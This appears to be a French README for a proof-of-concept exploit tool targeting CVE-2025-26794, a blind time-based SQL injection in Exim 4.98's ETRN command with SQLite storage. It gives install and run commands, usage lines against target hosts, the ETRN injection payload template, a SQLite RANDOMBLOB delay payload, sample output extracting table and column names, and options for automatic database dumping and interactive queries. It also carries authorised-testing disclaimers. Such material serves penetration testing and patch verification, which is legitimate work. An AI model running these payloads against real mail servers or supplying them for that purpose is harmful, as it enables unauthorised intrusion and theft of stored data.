
Exploit d'injection SQL pour CVE-2025-26794 dans Exim 4.98. Extraction automatisée de données via injection SQL aveugle basée sur le temps. Uniquement pour des tests d'intrusion autorisés.
Un outil d'exploit de preuve de concept pour CVE-2025-26794, démontrant une vulnérabilité d'injection SQL dans le serveur de messagerie Exim 4.98 via la commande ETRN lors de l'utilisation du stockage DBM SQLite.
RÉSERVÉ AUX TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT
Cet outil est fourni à des fins éducatives et pour les tests d'intrusion autorisés uniquement. L'accès non autorisé à des systèmes informatiques est illégal en vertu de diverses lois, notamment :
Vous devez disposer d'une autorisation écrite explicite avant de tester tout système dont vous n'êtes pas propriétaire.
Les auteurs et contributeurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.
CVE-2025-26794 est une vulnérabilité d'injection SQL dans Exim 4.98 qui se produit lorsque :
Cette vulnérabilité permet aux attaquants de :
# Clone the repository
git clone https://github.com/XploitGh0st/CVE-2025-26794-exploit.git
cd CVE-2025-26794-exploit
# Install dependencies (none required - uses standard library only)
pip install -r requirements.txt
# Make script executable (Linux/Mac)
chmod +x exploit.py
python3 exploit.py <target> [options]
python3 exploit.py 192.168.1.10 --test-only
python3 exploit.py mail.example.com --auto-dump
python3 exploit.py 10.0.0.5 --interactive
python3 exploit.py 192.168.1.10 --table users --columns
python3 exploit.py 192.168.1.10 --query "SELECT sqlite_version()"
ETRN #',1); <MALICIOUS_QUERY> /*
La charge utile exploite le nettoyage insuffisant dans le gestionnaire de sérialisation ETRN, permettant l'injection SQL dans les requêtes SQLite.
Utilise le délai temporel spécifique à SQLite :
SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
Cela crée un délai mesurable (~1-2 secondes) lorsque la condition est vraie.
╔═══════════════════════════════════════════════════════════╗
║ CVE-2025-26794: Exim SQLi Data Extraction Tool ║
║ FOR AUTHORIZED USE ONLY ║
╚═══════════════════════════════════════════════════════════╝
[*] Testing vulnerability...
[+] Normal response time: 0.123s
[+] Delayed response time: 1.456s
[!!!] VULNERABLE - Time difference: 1.333s
[*] Extracting table names...
[*] Extracting table 1...
[+] Extracted: users
[+] Found table: users
[*] Extracting columns from table 'users'...
[+] Found column: id
[+] Found column: username
[+] Found column: email
Si vous exécutez Exim 4.98 avec DBM SQLite :
L'exploit utilise la recherche binaire pour extraire efficacement les caractères :
unicode() : Obtenir la valeur ASCII d'un caractèresubstr() : Extraire une sous-chaîne du résultatsqlite_master : Table système pour l'énumération du schémapragma_table_info() : Extraction des métadonnées des colonnesLes contributions sont les bienvenues pour :
Veuillez vous assurer que toutes les contributions incluent :
Ce projet est publié à des fins éducatives uniquement. Utilisez-le de manière responsable et légale.
XploitGh0st
Si vous découvrez des vulnérabilités en utilisant cet outil :
Rappelez-vous : Un grand pouvoir implique de grandes responsabilités. Utilisez cet outil de manière éthique et légale.
| Option | Description |
|---|
host | Nom d'hôte ou adresse IP cible (requis) |
-p, --port | Port SMTP (défaut : 25) |
-t, --timeout | Délai d'expiration de la socket en secondes (défaut : 30) |
--threshold | Seuil de délai temporel pour la détection (défaut : 0,8 s) |
--test-only | Tester uniquement la vulnérabilité, sans extraction de données |
--auto-dump | Extraire automatiquement la structure et les données de la base de données |
--interactive | Lancer la console de requêtes SQL interactive |
--table TABLE | Cibler une table spécifique pour l'extraction |
--columns | Extraire les noms de colonnes (à utiliser avec --table) |
--query QUERY | Exécuter une requête SQL personnalisée |